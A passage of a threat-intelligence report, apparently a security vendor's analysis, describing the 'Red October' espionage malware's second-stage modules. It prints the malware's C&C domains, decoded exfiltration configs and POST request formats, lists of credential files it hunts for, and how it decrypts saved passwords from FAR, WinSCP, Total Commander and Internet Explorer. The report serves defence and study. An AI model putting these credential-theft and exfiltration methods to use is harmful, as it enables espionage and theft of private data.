“Red October”. Detailed Malware Description 2. Second Stage of Attack

First stage of attack

1. Exploits
2. Dropper
3. Loader Module
4. Main component

Second stage of attack

1. Modules, general overview
2. Recon group
3. Password group
4. Email group
5. USB drive group
6. Keyboard group
7. Persistence group
8. Spreading group
9. Mobile group
10. Exfiltration group

1. Modules, general overview

Module framework

The main component of Sputnik implements a framework for executing the “tasks” that are provided by its C&C servers.

Most of the tasks are provided as one-time PE DLL libraries that are received from the server, executed in memory and then immediately discarded.

Several tasks need to be constantly present, i.e. waiting for the iPhone or Nokia mobile to connect. These tasks are provided as PE EXE files and are installed to the infected machine.

Persistent tasks

• Once a USB drive is connected, search and extract files by mask/format, including deleted files. Deleted files are restored using a built in file system parser
• Wait for an iPhone or a Nokia phone to be connected. Once connected, retrieve information about the phone, its phone book, contact list, call history, calendar, SMS messages, browsing history
• Wait for a Windows Mobile phone to be connected. Once connected, infect the phone with a mobile version of the Sputnik main component
• Wait for a specially crafted Microsoft Office or PDF document and execute a malicious payload embedded in that document, implementing a one-way covert channel of communication that can be used to restore control of the infected machine
• Record all the keystrokes, make screenshots
• Execute additional encrypted modules according to a pre-defined schedule
• Retrieve e-mail messages and attachments from Microsoft Outlook and from reachable mail servers using previously obtained credentials

One-time tasks

• Collect general software and hardware environment information
• Collect filesystem and network share information, build directory listings, search and retrieve files by mask provided by the C&C server
• Collect information about installed software, most notably Oracle DB, RAdmin, IM software including Mail.Ru agent, drivers and software for Windows Mobile, Nokia, SonyEricsson, HTC, Android phones, USB drives
• Extract browsing history from Chrome, Firefox, Internet Explorer, Opera
• Extract saved passwords for Web sites, FTP servers, mail and IM accounts
• Extract Windows account hashes, most likely for offline cracking
• Extract Outlook account information
• Determine the external IP address of the infected machine
• Download files from FTP servers that are reachable from the infected machine (including those that are connected to its local network) using previously obtained credentials
• Write and/or execute arbitrary code provided within the task
• Perform a network scan, dump configuration data from Cisco devices if available
• Perform a network scan within a predefined range and replicate to vulnerable machines using the MS08-067 vulnerability
• Replicate via network using previously obtained administrative credentials

Module Groups

Group name	Descrition
Recon	Modules of this group designed to be used during first stage of cyberattack right after initial infiltration. Their main purpose is to collect general information about target system which helps locate and identify the infected machine, estimate potential value of current computer data and define which other modules should be pushed next. Also, these modules collect initial easy-to-get type of information such as browser history, browser cached credentials and FTP client settings.
Password	This group of modules is designed to steal credentials from various applications and resources, from Mail.ru Agent (popupal free app from mail.ru) to MS Outlook credentials and Windows account hashes (including cached Windows Domain account hashes). Capable of using low-level and direct disk access to copy protected files.
Email	This group serves stealing emails from local MS Outlook storage or remote POP3/IMAP mail server. It’s capable of dumping full email bodies with headers, saving attachments with predefined file extensions.
USB drive	This group is used to steal files from attached USB devices. It monitors USB device events and starts every time new device is attached. It can copy files from predefined extension list, size and age. This group capable of recognition, restoration and copying already deleted files of MS Office document formats by using own FAT-based filesystem parser.
Keyboard	This group is dedicated to recording keystrokes, grabbing text from password input fields and making screencaptures.
Persistence	Current group contains installer and payload code to plant a plugin in popular applications such as MS Office or Adobe Reader. The backdoor code is activated when specially crafted document is opened on target machine. This is used to regain lost access on a machine in case of unexpected loss of control (C&C server takedown or local malware cleaning).
Spreading	Modules of this group are used to scan for other hosts on the network, fingerprint them and then infect via MS08-067 or a list of stolen admin credentials. A module from this group is capable of dumping Cisco network router configuration via SNMP commands and embedded TFTP server.
Mobile	Mobile group is used to dump all valuable information about locally attached mobile device. It is capable of copying contact information, calendars, SMS and Emails databases and many other private data. These modules are capable of checking if a device was jailbroken.
Exfiltration	While some of other modules work in “offline” mode, collect and store data locally, this group of modules transfers all collected data to the C&C server. Modules of this group are capable of reaching FTP servers, remote network shares as well as local disk drives and copy files from these resources. Unlike Recon data collection modules these modules are designed to run repeatedly and bring only new valuable data.

Missing Modules

Group name	Descrition
USB Infection	There are modules that copy data files (such as execution logs) related to current malware family from USB drives. However, we haven’t seen a module to infect the USB drives yet. We suspect that this module is capable of infecting removable storage, running arbitrary modules from other groups and save data back to the USB drives.

Module comparison table

2. Recon group

RegConn module

Known variants:

MD5	Size	Compilation date (payload)
5447848f3a5fdaf97c498190ed501620	167,936 bytes	October 22nd, 2011

Summary

Gathers system related information. Records installed and recently run software, related application launch timestamps, enumerates attached usb devices like mobile phones and looks for software from this devices, checks for presence of custom enterprise software, maintains unfinished/unreferenced download+execute functionality, sends encrypted collected data at one of C&C servers (i.e. nt-windows-online.com;nt-windows-update.com;nt-windows-check.com).
This module is a Win32 Dll file. C runtime and several other libs statically linked into the executable with various optimizations enabled. All functionality is in DllMain function, no export names defined. Compiled with MS Visual C++ 2005.

Sequence of systems monitoring tasks

1. Gathers startup information, select environment variables and values %windir%, %username%, %userdomain%, %computername%)
2. Opens target directory c:\windows\prefetch, records all entries in the directory of applications recently run along with timestamp, i.e.

PREFETCH DEFRAG.EXE-273F131E.pf.2012-10-31 18:32:37
PREFETCH DUMPBIN.EXE-0751B17C.pf.2012-11-01 23:45:39

3. Loops through registry, attempts to access and record all recently used application data, i.e.

C:\Program Files\Common Files\Java\Java Update\jusched.exe, REG_SZ, Java(TM) Update Scheduler

C:\Documents and Settings\p\Local Settings\Application Data\Google\Update\GoogleUpdate.exe, REG_SZ, Google Installer

C:\Program Files\Messenger\msmsgs.exe, REG_SZ, Windows Messenger

4. Attempts to access and record a set of hardcoded registry keys related to enterprise software. Attempts to access and record related keys and values. Reports on success and failure of related key and value access, i.e.

REG ORACLE* CHECK
(1) Software\Oracle\Sun
Ray\ClientInfoAgent\DisconnectActions\@Default -> REG_SZ:""
(1) Software\Oracle\Sun Ray\ClientInfoAgent\ReconnectActions\
@Default -> REG_SZ:""

5. Attempts to access and record all registry keys and values related to context menu handlers and related executable pathnames, i.e.

Context MENU *\shellex\ContextMenuHandlers\7-Zip
(1) *\shellex\ContextMenuHandlers\7-Zip\@Default -> REG_SZ: "{23170F69-40C1-278A-1000-000100020000}"
(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\@Default -> REG_SZ: "7-Zip ShellExtension"
(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\@Default -> REG_SZ: "C:\Program Files\7-Zip\7-zip.dll"
(2) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel -> REG_SZ: "Apartment"

6. Attempts to access and record registry keys and values related to auto-start applications enumerated under the HKCU Run key and all HKLM\Userinit registry keys, i.e.

HKCU Run
(1) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VBoxTray ->
REG_SZ: "C:\WINDOWS\system32\VBoxTray.exe"
(2) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -
> REG_SZ: "C:\Program Files\Common Files\Java\Java Update\jusched.exe"

7. Attempts to access and record registry keys and values enabling email and webmail access under HKCU\Software\VB and VBA Program Settings\Webmailer, MSOffice settings, and HKCU\Software\Mail.ru\Agent\Agent, i.e.

REG_MRA Run
(1) Software\Mail.Ru\Agent\Agent -> REG_SZ: "1"

8. Attempts to access and record registry keys and values related to hardcoded list of attached mobile devices and also general USB devices and mobile synchronization and contact software. Reports on success and failure of related key and value access, i.e.

N2 Run
ERROR: can't make RegOpenKey for Software\Nokia\PC Suite at 412: 0
MSG: The operation completed successfully

9. Attempts to access and record registry keys and values related to list of all installed software. Reports on success and failure of related key and value access, i.e.

REG_SPEC_SSS_B Run
(1) SOFTWARE\Classes\Installer\Products\0B79C053C7D38M
EE4AB9A00CB3B5D2472\ProductName -> REG_SZ: "WebFldrs XP"

10. Attempts to access and record registry keys and values indicating the presence of Radmin v2.0 remote control software, i.e.

Radmin Run
ERROR: can't make RegOpenKey for SYSTEM\RAdmin\v2.0\Server\Parameters at 412: 0
MSG: The operation completed successfully

11. Attempts to open Firefox prefs.js and profiles.ini configuration files. Attempts to open Opera profile.ini, profile/Opera6.ini configuration files. Reads these files and identifies network proxies for each along with credential information. Retrieves Internet Explorer proxy preferences from the registry.
12. Searches for the following file types in the registry and corresponding handler and attempts to record related data for the following extensions:

.str	.tte	._ok	.ki	.tel	.tlg	.zfc	.encrypted	.zm9	.dat
.crp	.pcr	.safe	.ldf

13. As a part of the network activity loop, calls GetWindowsDirectoryA, GetDriveTypeA and GetVolumeInformation each time, collects hardware information most likely for unique identification. Attempts to resolve nt-windows-update.com domain name.
14. Following a successful call and return from WS2_32.WSAStartup and prior to WS2_32.gethostbyname, the collected data is encrypted.
15. Attempts to connect to nt-windows-online.com. POSTs encrypted data to nt-windows-online.com/cgi-bin/nt/sk/.
16. If POST to nt-windows-online.com fails, attempts the same process with nt-windows-check.com, nt-windows-update.com domains.
17. If no connections are made, attempts to use configured web browser proxy settings and uses them to connect to the three hard-coded domains listed above.
18. Connects and POSTs the stolen configuration data.
19. Maintains download and execute code. How this functionality is called at runtime is uncertain. There are no references to it at runtime, so it seems like something is missing or unfinished.

Hardcoded registry keys:

HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKLM\Software\Oracle
HKCU\Software\CIT
HKCU\Software\CIT Software
HKLM\Software
HKLM\Software\Baw
HKLM\Software\Baw2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCR\*\shellex\ContextMenuHandlers
HKCR\CLSID\

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKCU\SOFTWARE\VB and VBA Program Settings\WebMailer
HKCU\Software\Microsoft\Office\12.0\Common\General
HKCU\Software\Mail.Ru\Agent
HKLM\SOFTWARE\Classes\Installer\Products
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
HKCU\SOFTWARE\Microsoft\Windows CE Services
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\Software\Nokia
HKLM\Software\HTC\
HKLM\System\CurrentControlSet\Control\DeviceClasses
HKCR\SonyEricsson.PCCompanion.1\CLSID
HKLM\System\ControlSet001\Enum\Root\WPD\0000
HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\USB
HKLM\SYSTEM\RAdmin\

Wnhttp module

Known variants:

MD5	Compilation date (payload)
1b840c5b45cd015f51010e12938b528a	2012.09.05 07:02:33 (GMT)
65820769534fec10958573d1c8a545a8	2012.09.05 07:02:33 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share one code section, but contain different payloads in the resource section.
All the functionality is implemented in the DllMain function.

This module is a plugin to check Internet connectivity and get an external IP address of current system using popular public services such as 2ip.ru, myip.ru, smart-ip.net.

DllMain

The module collects basic system information such as current computer name, current username, and path to the original executable module where it started from. It creates a unique identifier of current system based on VolumeSerialNumber property of the disk where current Windows system is located or a hash of current computer name and ProductID value of Internet Explorer from HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID. This information is put in the log file in the first place along with current date and time.

This module loads a config/script from local resource AAA and sends out some network requests using standard WinInet API. The config/script AAA has the following contents:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "51070")
 SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
 SetOption(http_host, [7] "2ip.ru")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)
Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,
*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding:
gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)
SetOption(http_host, [12] "www.myip.ru")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)
Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,
*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)
SetOption(http_host, [13] "smart-ip.net")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)
Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)

While “conn_a” parameters are used to access C&C server during reporting stage, other parameters which start with "http_" are used to send out http requests. Target hosts as shown above are

1. 2ip.ru
2. www.myip.ru
3. smart-ip.net

The websites are used to get current IP address as it is visible on the Internet. If the machine is behind proxy or NAT router, the IP address might be different from the local one. Interestingly all websites of current module developers' choice are obviously owned by Russian-speaking people from former CIS countries, first two seem to be Russian and last one is Ukrainian.

The module simply sends HTTP GET requests to the root page of the websites and gets the response code from the headers as well as html/text source of the webpage, which is later uploaded to the C&C.

Current module doesn't create any local logs, instead all information is kept in memory, which is later compressed using Zlib 1.2.5, encrypted, encoded with Base64 algorithm and submitted to the C&C server.

Sysinfo module

Known variants:

MD5	Compilation date
e36b94cd608e3dfdf82b4e64d1e40681	2012.09.05 09:02:30 (GMT)
a2fe73d01fd766584a0c54c971a0448a	2012.09.05 09:02:30 (GMT)

The files differ only by few values from resources section (which contains configuration data) – code is identical.

This module is a PE DLL, written in C++, compiled with Microsoft Visual Studio 2010.

DLL resides only in memory – it does not drop itself or any other executables to the disk.

It creates %USERPROFILE%\Local Settings\Temp\tmpXX.tmp file (where XX is randomly generated hex number). During the analysis, the file stayed 0-bytes. Most probably, it's created for further data logs.

DLL collects a range of information about the computer (including the browsers history). This data is written to the memory, compressed with Zlib deflate() function – which also performs some XOR operations on it – encoded with base64 algorithm and sent by the HTTP POST request to the C&C server.

Initialization

After it is loaded to the memory, malware loads and locks resource BBB:AAA:0000, which contains config information;

It gets the information about local system and current process:

• computer name
• user name
• current module name
• pid

Then it creates a separate thread, which contains the main module functionality.

Main malware thread

First, it constructs an internal filename string "@INFO\SYSINFO_%u_%s.bin"

where %u is equal to 7 and %s is system time – obtained with use of GetLocalTime and SystemTimeToFileTime – in format:

"%04u%02u%02u_%02u%02u%02u_%03u"

if  FileTimeToSystemTime failed, it uses the default time string:

"16010101_000000_000"

if wsprintfW failed, it uses the default hardcoded filename:

"@INFO\SYSINFO_X_00000000_000000_000.txt"

Then it reads the configuration from the resources section and builds the structure containing all the necessary information at specific offsets. This structure is held only in memory.

It contains a resource named “AAA” with the following values in it:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "17486")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
Call(task_sysinfo)

Malware main thread calls 2 main subroutines:

• retrieves a lot of system information, including browsing history, and writes it to the in-memory log
• takes data from the configuration in resources to connect to the C&C and submit collected data

Data collection

Malware collects following information:

• current file time
• local time
• username
• computer name
• is admin (if the user has administrative rights)
• language
• ansi code package
• oem code package
• time zone
• current module name
• current directory
• temp directory path
• Windows directory path
• system directory path
• major OS version
• minor OS version
• build number
• service pack number
• platform id

Additionally, to obtain default applications for HTTP, HTTPS, HTMLFILE and MAILTO malware uses RegQueryValueEx to check following registry keys under

• HKCR\ttp\shell\open\command
• HKCR\https\shell\open\command
• HKCR\htmfile\shell\open\command
• HKCR\mailto\shell\open\command

Following parameters are retrieved for each disk, including optical drives and shared mounts:

• root path
• filesystem name
• volume name
• drive type
• volume serial number
• filesystem flags
• maximum component length
• sectors per cluster
• bytes per sector
• number of free clusters
• number of total clusters
• free bytes available
• total number of bytes
• total number of free bytes

Then it collects information about local network adapters:

• Adapter Name
• Adapter Description
• Address Length
• Adapter MAC Address
• Adapter Index
• Adapter Type
• DhcpEnabled
• CurrentIpAddress
• IpAddressList
• GatewayList
• DhcpServer
• HaveWins
• PrimaryWinsServer
• SecondaryWinsServer
• LeaseObtained
• LeaseExpires

The malware looks for URL history from following browsers:

Chrome, Mozilla Firefox, Internet Explorer, Opera

1.  Chrome history:

Before the malware is performing the SQL queries on the browsers profile-files, it copies the original file into a temp-file.

To get the Tempfile path and name it makes use of GetTempPathW and GetTempFileNameW with prefix ”tmp”.

The Tempfile will be named like this:

tmpXX.tmp

Where XX is a 2-digit number starting from 00.

Malware use following SQL query:

SELECT * FROM urls

to extract URLs (with titles, last visited date) from Chrome history database:

\Google\Chrome\User Data\Default\History

2. Mozilla history (sub_10015430):

Malware use following SQL query:

SELECT * FROM moz_places

to extract URLs from Mozilla history database:

\Mozilla\Firefox\Profiles\%profilename%\places.sqlite

In both cases, malware performs SQL related actions with use of functions from embedded SQL library (most probably parts of sqlite3.dll).

3. IE history (sub_10014F50):

Malware calls CoCreateInstance function with following values:

CLSID   3C374A40-BAE4-11CF-BF7D-00AA006946EE Microsoft Url History Service
RIID     AFA0DC11-C313-11D0-831A-00C04FD5AE38 SID_IUrlHistoryStg2

i.e. it uses IUrlHistory interface to search through the history and calls  SHDOCVW!CEnumSTATURL to enumerate URLs.

It also makes use of shdocvw.dll which is responsible to get control over IE. The call-adresses are resolved dynamically:

4. Opera history (sub_10014EB0):

Malware gets the Opera folder path and searches it for URLs in files:

global_history.dat, global.dat

All above subroutines retrieves URL + Title + Last Visited Time and write them to the memory (after the previous data).

Also, a DNS resolve is performed on all domain names.

This module also calls GetEnvironmentStrings to retrieve all environment variables.

It is also interested in current Windows Domain information

• DomainControllerName
• DomainControllerAddress
• DomainControllerAddressType
• DomainGuid 
• DomainName
• DnsForestName
• Flags  
• DcSiteName 
• ClientSiteName

The malware looks for all running processes and all modules loaded into their address space. For each file it retrieves following values from the version info:

• \StringFileInfo\%04x%04x\SpecialBuild
• \StringFileInfo\%04x%04x\PrivateBuild
• \StringFileInfo\%04x%04x\ProductVersion
• \StringFileInfo\%04x%04x\ProductName
• \StringFileInfo\%04x%04x\OriginalFilename
• \StringFileInfo\%04x%04x\LegalTrademarks
• \StringFileInfo\%04x%04x\LegalCopyright
• \StringFileInfo\%04x%04x\InternalName
• \StringFileInfo\%04x%04x\FileVersion
• \StringFileInfo\%04x%04x\FileDescription
• \StringFileInfo\%04x%04x\CompanyName

It looks for installed programs information by enumerating registry key:

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

For each entry it retrieves following values:

• DisplayName
• DislayVersion
• DisplayIcon
• InstallDate
• UninstallString
• InstallSource
• InstallLocation

It retrieves information about installed USB devices.

Class GUID is hardcoded and equals:           

{A5DCBF10-6530-11D2-901F-00C04FB951ED} → GUID_DEVINTERFACE_USB_DEVICE

The malware checks registry for proxy settings and extracts proxy address somewhere (to some struct or class in the memory) if present:

[HKLM|HKCU]

\Software\Microsoft\Windows\CurrentVersion\Internet Settings@ProxyServer

\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\InternetSettings@ProxyServer

It also checks registry for the value MapMenuConfigGrps (not sure what that is), extracts the data and write it somewhere:

[HKLM|HKCU]

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps

\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps

It checks Opera config files for proxy server and other server settings.

In files opera6.ini or operaprefs.ini it looks for the following strings:

SOCKS server

WAIS server

Gopher server

FTP server

HTTP server

HTTPS server

In file prefs.js it looks for strings:

user_pref("network.proxy.socks"

user_pref("network.proxy.socks_port"

user_pref("network.proxy.ftp"

user_pref("network.proxy.ftp_port"

user_pref("network.proxy.ssl"

user_pref("network.proxy.ssl_port"

user_pref("network.proxy.http"

user_pref("network.proxy.http_port"

Then malware compresses the information stored in memory using ZLib library and encrypted with custom algorihtm.

Then it connects to the C&C server defined in AAA config and sends a POST request containing compressed, xored and base64-encoded data:

POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0

Host: nt-windows-online.com:80

Pragma: no-cache

Cache-Control: no-cache

Content-length: 29276

Content-Type: application/x-www-form-urlencoded

Data format

Malware collects the data in the memory allocated on the heap. The memory chunk with the prepared data starts with the magic number (4E 44 00 00) following by the filename as Unicode string (@INFO\SYSINFO_%u_%s.bin) and the size of data.

After the size value comes the actual information part. This part is compressed and encrypted/encoded and sent via the POST request. Data in this part is structured in the same order as it was retrieved (so first comes the system info, then disks info, network adapters, URL history, etc.). All strings are Unicode – with the exception of browsing info, which is encoded n ANSI.

GetWebFtp module

Known variants:

MD5	Compilation date (payload)
d1699431d56a690e1b84aa8dddffd28f	2012.10.22 07:05:01 (GMT)

The file is a PE DLL file, compiled with Microsoft Visual Studio 2005. No functions are exported.

Network function

All the requests to a CnC server are of the following pattern:

POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1
Host: %CnC%
Connection: close
Content-Length: %d\r\n\r\n
DATA

The POST data is of the following structure:

Number1 + HexString + "\r\nSubject: %s\r\n\r\n" + Buffer
Number1  is 16-byte value that depends on VolumeSerialNumber, Computer name and “ProductID” key in HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration

Buffer is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

The list of the CnCs:
nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

After resolving CnC domain tries to directly send POST request.

It always expects the server to return “500” error code («Internal Server Error») in all the requests. If this error code actually received then the function returns success, and no more actions in the network function are done.

If the first sending-receiving routine returns failure then the module tries to find a proxy server and connect to it. For that purpose it retrieves a path to a browser in a registry:

HKLM\SOFTWARE\Classes\HTTP\shell\open\command

If the browser is InternetExplorer then checks the following keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer

If the browser is Firefox then reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves its “Path” value. After that reads %APPDATA%\Mozilla\Firefox\%Path%\prefs.js and retrieves proxy and port from the settings starting with “user_pref( network.proxy.*”.

If the browser is Opera then reads the file %APPDATA%\Opera\Opera\profile\opera6.ini, finds the [Proxy] section and finds string which matches “HTTP.*=.*:.*” and retrieves server and port from it.

DllMain

Tries to call RegisterServiceProcess API from kernel32.dll (this API existed in Windows 9x)

Sends POST request with the Subject: “Reflebt” and “===” Buffer.

Starts searching for specific files on the following Drives: (c:,d:,e:,f:,g:)

The list of interested files:

 "*.odu"

 "*.pfx"

 "Favorites.dat"

"FileZilla.xml"

"History.dat"

"Quick.dat"

"RushSite.xml"

"ScribeOptions.xml"

"Sites.dat"

"Sites.xml"

"SmartFTP*"

"TheBee.ini"

"account.cfn"

"account.xml"

"accounts.ini"

"addrbk.dat"

"andrq.ini"

"bpftp.dat"

"clients.dat"

"digsby.dat"

"ftplist.txt"

"global.xml"

"keychain.plist"

"signons.txt"

"sm.dat"

"smdata.dat"

"users.txt"

"wand.dat"

"wcx_ftp.ini"

"ws_ftp.ini"

Also the module enumerates network shares. The initial purpose of that seems to be searching for the same files in the network shares, but there is a bug in the code which prevents from doing it. (FindFirstFile API call doesn’t get the string with wildcards as its first parameter, it only gets the string of a network share without appending a wildcard to it, so the API always returns INVALID_HANDLE_VALUE).

If any of these files is found, then the module adds its information to a Buffer for POST request which contains the following: file path, file contents, file creation time, last access time, last write time (all system time format), file size, the current position in stream, the number of bytes read from file. The final Buffer can contain information about several files at once. The non-compressed Buffer size can’t exceed a definite value (a little more than 358571 bytes), and the files can be partially sent.

POST request with files is sent with the Subject: “Reflect”.

After all the files are processed the module sends the final POST request with the Subject: “Refleet” and “===” Buffer.

AuthInfo Module

Known variants:

MD5	Compilation date (payload)
793c82efc65a43ed249a45ec7c69a388	2012.09.05 07:02:18 (GMT)
428de53f1a1eaa040847b6456b7e5369	2012.09.05 07:02:18 (GMT)

Summary

The file is a PE DLL file, compiled with Microsoft Visual Studio 2010. No functions are exported. Its main purpose is to steal credential information from various popular file managers, email clients, browsers and FTP client software.

DllMain function

When loaded, the module retrieves its resource of type “BBB” and name “AAA”, and starts an internal plugin framework. The main function of the module is named “task_authinfo” and is registered in the framework. Then, it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")

 SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")

 SetOption(conn_a.D_RPRT, [3] "80")

 SetOption(conn_a.D_SPRT, [3] "80")

 SetOption(conn_a.D_USER, [21] "%removed%")

 SetOption(conn_a.D_MODE, 0x0033)

 SetOption(conn_a.D_PASS, 0x00)

 SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")

 SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")

 SetOption(conn_a.J_USER, [21] "%removed%")

 SetOption(conn_a.J_RPRT, [3] "80")

 SetOption(conn_a.J_SPRT, [3] "80")

 SetOption(conn_a.J_MODE, 0x0033)

 SetOption(conn_a.J_PASS, 0x00)

 SetOption(conn_a.VERSION_ID, [6] "51070")

 SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")

 SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")

 Call(task_authinfo)

The module creates two output buffers (lets call them Buffer1 and Buffer2).

The Buffer1 starts with the following string: "@INFO\AUTHINFO_%u_%s.txt"

Where %u equals to 6, %s is system time in the following format: "%04u%02u%02u_%02u%02u%02u_%03u"

If FileTimeToSystemTime API failed, it uses the default time string: "16010101_000000_000"

If wsprintfW API failed, it uses the default hardcoded filename: "@INFO\SYSINFO_X_00000000_000000_000.txt"

Also it constructs the following string: "@INFO\AUTHINFO_%u_%s.bin” for being a header of Buffer2, but the module is compiled in that way that the retrieved data is not copied to Buffer2 and as a result is not sent to the CnC (that’s probably a developer’s mistake).

Buffer1 (.txt) is used to store general information text strings for logging purpose, and Buffer2 (.bin) is used to store information retrieved from the registry values and file contents, including binary data.

Data collection

In all the functions if a host is retrieved, it is also resolved to its IP.

1.  Far Manager FTP data

Buffer1 sample data:

START

  BEGIN : Far

  FAR : regkey '%s' opened – OK

  END : Far, size : %d

Extracts the following data from registry for Buffer2:

HKCU\Software\Far2\Plugins\FTP\Hosts\Item\

“HostName“, “ User“, “Password“ values data.

The “Password” value data is decrypted with a publicly known FAR FTP decryption algorithm based on simple XOR.

2.  Winscp data

Buffer1 sample data:

  BEGIN : Winscp

    WINSCP : regvalue username found  - OK

  END : Winscp, size : %d

Enumerates subkeys in the following key and retrieves value data for Buffer2:

HKCU\Software\Martin Prikryl\WinSCP 2\Sessions\

Value names: “UserName”, "Password", "PortNumber", "FSProtocol", "HostName"

The “Password” value data is decrypted with a publicly known Winscp algorithm which is based on a bitwise operations and XOR using “UserName” concatenated with the “HostName” as a key.

3.  TotalCommander data

Buffer1 data sample:

  BEGIN : TotalCommander

    TOTAL COM : wcx_ftp.ini found – OK

  END : TotalCommander, size : %d

Searches for “wcx_ftp.ini” file, reads its contents and extracts values for parameters: "username", "host", "password".

The “password” value data is decrypted with a publicly known TotalCommander algorithm which is based on XOR.

4.  Internet Explorer 7 and 8 data

Buffer1 data sample:

  BEGIN : IE78

    IE78 : regkey opened – OK

  END : IE78, size : %d

Enumerates value names in the following key:

HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2\

The module creates Microsoft URL History Service instance and enumerates URLs from the browser history. It calculates URL hash using CryptHashData API (SHA1 algorithm) and compares it with the value names from the previous registry key. If they coincide the module retrieves the registry data for the corresponding hash and decrypts the data using CryptUnprotectData API. As a result Autocomplete passwords and the corresponding URLs are obtained.

5.  Internet Explorer 6 and Outlook data

Buffer1 data sample:

  BEGIN : IE6, OutlookEx

    OUTLOOK EXP : LoadLibrary: pstorec.dll: %u – ERROR

    IE6 : pstore contains data - OK

Attempts to load library called “pstorec.dll”. If pstorec.dll library couldn’t be loaded then starts working with registry immediately.

